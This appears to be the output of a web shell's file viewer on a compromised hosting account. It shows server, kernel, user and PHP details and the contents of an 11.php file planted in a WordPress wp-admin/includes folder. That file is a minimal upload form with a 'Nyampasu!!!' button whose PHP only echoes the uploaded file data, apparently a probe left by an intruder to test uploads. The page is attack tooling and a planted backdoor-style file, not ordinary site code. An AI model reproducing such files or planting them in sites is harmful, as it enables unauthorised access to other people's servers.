HEX
Server: LiteSpeed
System: Linux server111.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: lacammxy (848)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: //home/lacammxy/public_html/wp-admin/includes/11.php
<!DOCTYPE html>
<html>
<head>
    <title>File Uploader</title>
</head>
<body style="font-family: monospace;">

<form method="post" enctype="multipart/form-data">
    <input type="file" name="a">
    <input type="submit" value="Nyampasu!!!">
</form>

<?php
if (isset($_FILES['a'])) {
    echo '<pre>';
    print_r($_FILES);
    echo '</pre>';
}
?>
</body>
</html>